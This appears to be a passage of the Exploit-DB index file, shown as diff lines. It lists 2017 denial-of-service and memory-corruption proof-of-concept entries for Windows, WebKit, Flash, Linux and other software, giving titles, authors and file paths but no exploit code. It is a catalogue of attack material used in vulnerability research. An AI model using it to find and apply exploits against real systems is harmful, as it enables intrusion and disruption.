+42002,exploits/windows/dos/42002.txt,"Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,dos,windows, +42006,exploits/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",dos,windows, +42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows, +42008,exploits/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",dos,windows, +42009,exploits/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",dos,windows, +42014,exploits/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,dos,ios, +42017,exploits/multiple/dos/42017.txt,"Adobe Flash - AVC Deblocking Out-of-Bounds Read",2017-05-17,"Google Security Research",dos,multiple, +42018,exploits/multiple/dos/42018.txt,"Adobe Flash - Margin Handling Heap Corruption",2017-05-17,"Google Security Research",dos,multiple, +42019,exploits/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",dos,multiple, +42021,exploits/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",dos,windows, +42027,exploits/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",dos,multiple, +42081,exploits/windows/dos/42081.txt,"Microsoft MsMpEng - Multiple Crashes While Scanning Malformed Files",2017-05-29,"Google Security Research",dos,windows, +42040,exploits/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",dos,windows, +42046,exploits/macos/dos/42046.txt,"Apple macOS - '32-bit syscall exit' Kernel Register Leak",2017-05-22,"Google Security Research",dos,macos, +42047,exploits/macos/dos/42047.txt,"Apple macOS - 'stackshot' Raw Frame Pointers",2017-05-22,"Google Security Research",dos,macos, +42048,exploits/linux/dos/42048.c,"Linux Kernel 4.11 - eBPF Verifier Log Leaks Lower Half of map Pointer",2017-05-22,"Google Security Research",dos,linux, +42049,exploits/multiple/dos/42049.txt,"Apple iOS/macOS - Memory Corruption Due to Bad Bounds Checking in NSCharacterSet Coding for NSKeyedUnarchiver",2017-05-23,"Google Security Research",dos,multiple, +42050,exploits/multiple/dos/42050.txt,"Apple iOS/macOS - NSUnarchiver Heap Corruption Due to Lack of Bounds Checking in [NSBuiltinCharacterSet initWithCoder:]",2017-05-23,"Google Security Research",dos,multiple, +42051,exploits/multiple/dos/42051.txt,"Apple iOS/macOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error",2017-05-23,"Google Security Research",dos,multiple, +42052,exploits/multiple/dos/42052.txt,"Apple iOS/macOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking",2017-05-23,"Google Security Research",dos,multiple, +42054,exploits/multiple/dos/42054.c,"Apple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization",2017-05-23,"Google Security Research",dos,multiple, +42055,exploits/multiple/dos/42055.c,"Apple iOS/macOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling",2017-05-23,"Google Security Research",dos,multiple, +42056,exploits/macos/dos/42056.c,"Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",dos,macos, +42063,exploits/multiple/dos/42063.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'WebCore::FrameView::scheduleRelayout' Use-After-Free",2017-05-25,"Google Security Research",dos,multiple, +42070,exploits/multiple/dos/42070.c,"Skia Graphics Library - Heap Overflow due to Rounding Error in SkEdge::setLine",2017-05-25,"Google Security Research",dos,multiple, +42071,exploits/multiple/dos/42071.html,"Mozilla Firefox < 53 - 'gfxTextRun' Out-of-Bounds Read",2017-05-25,"Google Security Research",dos,multiple, +42072,exploits/multiple/dos/42072.html,"Mozilla Firefox < 53 - 'ConvolvePixel' Memory Disclosure",2017-05-25,"Google Security Research",dos,multiple, +42073,exploits/windows/dos/42073.py,"Sandboxie 5.18 - Local Denial of Service",2017-05-25,ScrR1pTK1dd13,dos,windows, +42092,exploits/windows/dos/42092.txt,"Microsoft MsMpEng - Use-After-Free via Saved Callers",2017-05-30,"Google Security Research",dos,windows, +42103,exploits/linux/dos/42103.js,"WebKit JSC - 'JSObject::ensureLength' ensureLengthSlow Check Failure",2017-06-01,"Google Security Research",dos,linux, +42104,exploits/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",dos,multiple, +42108,exploits/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",dos,multiple, +42110,exploits/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",dos,linux, +42112,exploits/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,dos,windows, +42115,exploits/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow (PoC)",2017-06-05,FarazPajohan,dos,linux, +42123,exploits/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,dos,multiple, +42124,exploits/multiple/dos/42124.txt,"Wireshark 2.2.0 < 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,dos,multiple, +42135,exploits/android/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",dos,android, +42136,exploits/linux/dos/42136.c,"Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service",2017-06-07,"Marcus Meissner",dos,linux, +42137,exploits/linux/dos/42137.txt,"PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption",2017-06-07,"Tim Kosse",dos,linux,22 +42138,exploits/linux/dos/42138.txt,"Artifex MuPDF - Null Pointer Dereference",2017-06-07,"Kamil Frankowicz",dos,linux, +42139,exploits/linux/dos/42139.txt,"Artifex MuPDF mujstest 1.10a - Null Pointer Dereference",2017-02-17,"Agostino Sarubbo",dos,linux, +42140,exploits/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",dos,windows, +42144,exploits/linux/dos/42144.py,"Mapscrn 2.03 - Local Buffer Overflow",2017-06-09,"Juan Sacco",dos,linux, +42147,exploits/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,dos,linux, +42148,exploits/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,dos,linux, +42162,exploits/linux/dos/42162.txt,"GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference",2017-06-12,"Hanno Boeck",dos,linux, +42169,exploits/android/dos/42169.txt,"LG MRA58K - Out-of-Bounds Heap Read in CAVIFileParser::Destroy Resulting in Invalid Free",2017-06-13,"Google Security Research",dos,android, +42170,exploits/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",dos,android, +42171,exploits/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",dos,android, +42182,exploits/windows/dos/42182.cpp,"Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation",2017-06-15,bee13oy,dos,windows, +42188,exploits/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",dos,multiple, +42189,exploits/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",dos,multiple, +42190,exploits/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",dos,multiple, +42191,exploits/multiple/dos/42191.html,"WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow",2017-06-16,"Google Security Research",dos,multiple, +42198,exploits/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",dos,linux, +42199,exploits/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",dos,linux, +42200,exploits/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",dos,linux, +42201,exploits/linux/dos/42201.txt,"GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow",2017-06-19,"Alexandre Adamski",dos,linux, +42202,exploits/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",dos,linux, +42203,exploits/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",dos,linux, +42204,exploits/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",dos,linux, +42207,exploits/linux/dos/42207.txt,"Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service",2017-06-20,qflb.wu,dos,linux, +42210,exploits/windows/dos/42210.cpp,"Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42211,exploits/windows/dos/42211.cpp,"Microsoft Windows - 'IOCTL 0x390400_ operation code 0x00020000' Kernel KsecDD Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42212,exploits/windows/dos/42212.cpp,"Microsoft Windows - 'IOCTL_MOUNTMGR_QUERY_POINTS' Kernel Mountmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42213,exploits/windows/dos/42213.cpp,"Microsoft Windows - '0x224000 IOCTL (WmiQueryAllData)' Kernel WMIDataDevice Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42214,exploits/windows/dos/42214.txt,"Microsoft Windows - 'win32k!NtGdiEnumFonts' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42215,exploits/windows/dos/42215.cpp,"Microsoft Windows - 'IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS' volmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42216,exploits/windows/dos/42216.cpp,"Microsoft Windows - 'IOCTL_DISK_GET_DRIVE_GEOMETRY_EX' Kernel partmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42217,exploits/windows/dos/42217.cpp,"Microsoft Windows - 'IOCTL_DISK_GET_DRIVE_LAYOUT_EX' Kernel partmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42218,exploits/windows/dos/42218.cpp,"Microsoft Windows - 'nt!NtQueryVolumeInformationFile (FileFsVolumeInformation)' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42219,exploits/windows/dos/42219.cpp,"Microsoft Windows - 'nt!NtNotifyChangeDirectoryFile' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",dos,windows, +42220,exploits/windows/dos/42220.cpp,"Microsoft Windows - 'nt!KiDispatchException' Kernel Stack Memory Disclosure in Exception Handling",2017-06-21,"Google Security Research",dos,windows, +42224,exploits/windows/dos/42224.cpp,"Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42225,exploits/windows/dos/42225.cpp,"Microsoft Windows - 'win32k!NtGdiGetTextMetricsW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42226,exploits/windows/dos/42226.cpp,"Microsoft Windows - 'win32k!NtGdiGetRealizationInfo' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42227,exploits/windows/dos/42227.cpp,"Microsoft Windows - 'win32k!ClientPrinterThunk' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42228,exploits/windows/dos/42228.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (BasicLimitInformation_ ExtendedLimitInformation)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42229,exploits/windows/dos/42229.cpp,"Microsoft Windows - 'nt!NtQueryInformationProcess (ProcessVmCounters)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42230,exploits/windows/dos/42230.txt,"Microsoft Windows - 'win32k!NtGdiMakeFontDir' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42231,exploits/windows/dos/42231.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42232,exploits/windows/dos/42232.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42233,exploits/windows/dos/42233.cpp,"Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",dos,windows, +42234,exploits/windows/dos/42234.txt,"Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap-Based Memory Corruption",2017-06-23,"Google Security Research",dos,windows, +42235,exploits/windows/dos/42235.txt,"Microsoft Windows - 'USP10!ttoGetTableData' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, +42236,exploits/windows/dos/42236.txt,"Microsoft Windows - 'USP10!SubstituteNtoM' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, +42237,exploits/windows/dos/42237.txt,"Microsoft Windows - 'USP10!CreateIndexTable' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, +42238,exploits/windows/dos/42238.txt,"Microsoft Windows - 'USP10!NextCharInLiga' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, +42239,exploits/windows/dos/42239.txt,"Microsoft Windows - 'USP10!otlSinglePosLookup::getCoverageTable' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, +42240,exploits/windows/dos/42240.txt,"Microsoft Windows - 'USP10!otlValueRecord::adjustPos' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, +42241,exploits/windows/dos/42241.txt,"Microsoft Windows - 'USP10!otlReverseChainingLookup::apply' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",dos,windows, +42242,exploits/windows/dos/42242.cpp,"Microsoft Windows - 'nt!NtQueryInformationResourceManager (information class 0)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",dos,windows, +42243,exploits/windows/dos/42243.txt,"Microsoft Windows Kernel - 'ATMFD.DLL' Out-of-Bounds Read due to Malformed Name INDEX in the CFF Table",2017-06-23,"Google Security Research",dos,windows, +42244,exploits/windows/dos/42244.cpp,"Microsoft Windows - 'nt!NtQueryInformationWorkerFactory (WorkerFactoryBasicInformation)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",dos,windows, +42245,exploits/multiple/dos/42245.txt,"unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",dos,multiple, +42246,exploits/windows/dos/42246.html,"Microsoft Edge - 'CssParser::RecordProperty' Type Confusion",2017-06-23,"Google Security Research",dos,windows, +42247,exploits/multiple/dos/42247.txt,"Adobe Flash - AVC Edge Processing Out-of-Bounds Read",2017-06-23,"Google Security Research",dos,multiple, +42248,exploits/multiple/dos/42248.txt,"Adobe Flash - Image Decoding Out-of-Bounds Read",2017-06-23,"Google Security Research",dos,multiple, +42249,exploits/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",dos,multiple, +42253,exploits/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,dos,windows, +42258,exploits/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, +42259,exploits/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",dos,linux, +42260,exploits/multiple/dos/42260.py,"IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow",2017-06-26,defensecode,dos,multiple, +42264,exploits/windows/dos/42264.txt,"Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API",2017-06-27,"Google Security Research",dos,windows, +42272,exploits/netbsd_x86/dos/42272.c,"NetBSD - 'Stack Clash' (PoC)",2017-06-28,"Qualys Corporation",dos,netbsd_x86, +42277,exploits/freebsd_x86/dos/42277.c,"FreeBSD - 'FGPU' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",dos,freebsd_x86, +42278,exploits/freebsd_x86/dos/42278.c,"FreeBSD - 'FGPE' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",dos,freebsd_x86, +42279,exploits/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",dos,freebsd_x86, +42285,exploits/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",dos,android, +42286,exploits/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",dos,multiple, +42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181 +42299,exploits/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",dos,linux, +42300,exploits/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",dos,linux, +42301,exploits/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,dos,linux, +42302,exploits/windows/dos/42302.txt,"Firefox 54.0.1 - Denial of Service",2017-07-07,hyp3rlinx,dos,windows, +42336,exploits/windows/dos/42336.html,"Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption",2017-07-18,"Google Security Research",dos,windows, +42337,exploits/windows/dos/42337.html,"Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion",2017-07-18,"Google Security Research",dos,windows, +42338,exploits/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 NsiGetParameter' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",dos,windows, +42360,exploits/multiple/dos/42360.html,"WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple, +42361,exploits/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple, +42362,exploits/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple, +42363,exploits/multiple/dos/42363.html,"WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow",2017-07-24,"Google Security Research",dos,multiple, +42364,exploits/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple, +42365,exploits/multiple/dos/42365.html,"WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free",2017-07-24,"Google Security Research",dos,multiple, +42366,exploits/multiple/dos/42366.html,"WebKit - 'WebCore::Node::getFlag' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple, +42367,exploits/multiple/dos/42367.html,"WebKit - 'WebCore::getCachedWrapper' Use-After-Free",2017-07-24,"Google Security Research",dos,multiple, +42373,exploits/multiple/dos/42373.html,"WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling",2017-07-25,"Google Security Research",dos,multiple, +42374,exploits/multiple/dos/42374.html,"WebKit JSC - 'arrayProtoFuncSplice' Uninitialized Memory Reference",2017-07-25,"Google Security Research",dos,multiple, +42375,exploits/multiple/dos/42375.html,"WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy",2017-07-25,"Google Security Research",dos,multiple, +42376,exploits/multiple/dos/42376.html,"WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling",2017-07-25,"Google Security Research",dos,multiple, +42377,exploits/multiple/dos/42377.txt,"WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free",2017-07-25,"Google Security Research",dos,multiple, +42386,exploits/linux/dos/42386.txt,"GNU libiberty - Buffer Overflow",2017-07-27,"Marcel Böhme",dos,linux, +42389,exploits/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,dos,linux, +42390,exploits/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,dos,linux, +42391,exploits/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,dos,linux, +42396,exploits/linux/dos/42396.txt,"DivFix++ 0.34 - Denial of Service",2017-07-31,qflb.wu,dos,linux, +42397,exploits/linux/dos/42397.txt,"Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service",2017-07-31,qflb.wu,dos,linux, +42398,exploits/linux/dos/42398.txt,"Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities",2017-07-31,qflb.wu,dos,linux, +42399,exploits/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,dos,linux, +42400,exploits/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,dos,linux, +42409,exploits/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,dos,linux, +42411,exploits/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",dos,windows, +42433,exploits/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,dos,linux, +42445,exploits/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",dos,win_x86-64, +42451,exploits/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",dos,windows, +42464,exploits/windows/dos/42464.html,"Microsoft Edge Chakra - 'PreVisitCatch' Missing Call",2017-08-17,"Google Security Research",dos,windows, +42465,exploits/windows/dos/42465.html,"Microsoft Edge Chakra - 'chakra!Js::GlobalObject' Integer overflow",2017-08-17,"Huang Anwen",dos,windows, +42466,exploits/windows/dos/42466.html,"Microsoft Edge Chakra - Buffer Overflow",2017-08-17,"Huang Anwen",dos,windows, +42467,exploits/windows/dos/42467.html,"Microsoft Edge Chakra - NULL Pointer Dereference",2017-08-17,"Huang Anwen",dos,windows, +42468,exploits/windows/dos/42468.html,"Microsoft Edge Chakra - Heap Buffer Overflow",2017-08-17,"Huang Anwen",dos,windows, +42469,exploits/windows/dos/42469.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrectly Re-parses",2017-08-17,"Google Security Research",dos,windows, +42470,exploits/windows/dos/42470.html,"Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service)",2017-08-17,"Google Security Research",dos,windows, +42471,exploits/windows/dos/42471.html,"Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service)",2017-08-17,"Google Security Research",dos,windows, +42472,exploits/windows/dos/42472.html,"Microsoft Edge Chakra - 'EmitAssignment' uses the 'this' Register Without Initializing",2017-08-17,"Google Security Research",dos,windows, +42473,exploits/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",dos,windows, +42474,exploits/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",dos,windows, +42475,exploits/windows/dos/42475.html,"Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly",2017-08-17,"Google Security Research",dos,windows, +42476,exploits/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments (1)",2017-08-17,"Google Security Research",dos,windows, +42477,exploits/windows/dos/42477.html,"Microsoft Edge Chakra - Uninitialized Arguments (2)",2017-08-17,"Google Security Research",dos,windows, +42478,exploits/windows/dos/42478.html,"Microsoft Edge Chakra - 'EmitNew' Integer Overflow",2017-08-17,"Google Security Research",dos,windows, +42479,exploits/windows/dos/42479.html,"Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3",2017-08-17,"Google Security Research",dos,windows, +42480,exploits/windows/dos/42480.txt,"Adobe Flash - Invoke Accesses Trait Out-of-Bounds",2017-08-17,"Google Security Research",dos,windows, +42481,exploits/windows/dos/42481.js,"Microsoft Edge - Out-of-Bounds Access when Fetching Source",2017-08-17,"Google Security Research",dos,windows, +42483,exploits/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",dos,windows, +42486,exploits/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",dos,windows, +42495,exploits/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",dos,windows, +42546,exploits/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,dos,linux, +42518,exploits/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",dos,hardware, +42600,exploits/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",dos,linux, +42602,exploits/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",dos,multiple, +42652,exploits/linux/dos/42652.txt,"tcprewrite - Heap-Based Buffer Overflow",2017-09-11,FarazPajohan,dos,linux, +42666,exploits/multiple/dos/42666.txt,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (1)",2017-09-12,"Google Security Research",dos,multiple, +42747,exploits/windows/dos/42747.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, +42741,exploits/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, +42742,exploits/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, +42743,exploits/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, +42744,exploits/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' (Denial of Service)",2017-09-18,"Google Security Research",dos,windows, +42746,exploits/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' (Denial of Service)",2017-09-18,"Google Security Research",dos,windows, +42748,exploits/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, +42749,exploits/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",dos,windows, +42758,exploits/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",dos,windows, +42759,exploits/windows/dos/42759.html,"Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read",2017-09-19,"Google Security Research",dos,windows, +42762,exploits/linux/dos/42762.txt,"Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",dos,linux, +42763,exploits/windows/dos/42763.html,"Microsoft Edge - Chakra 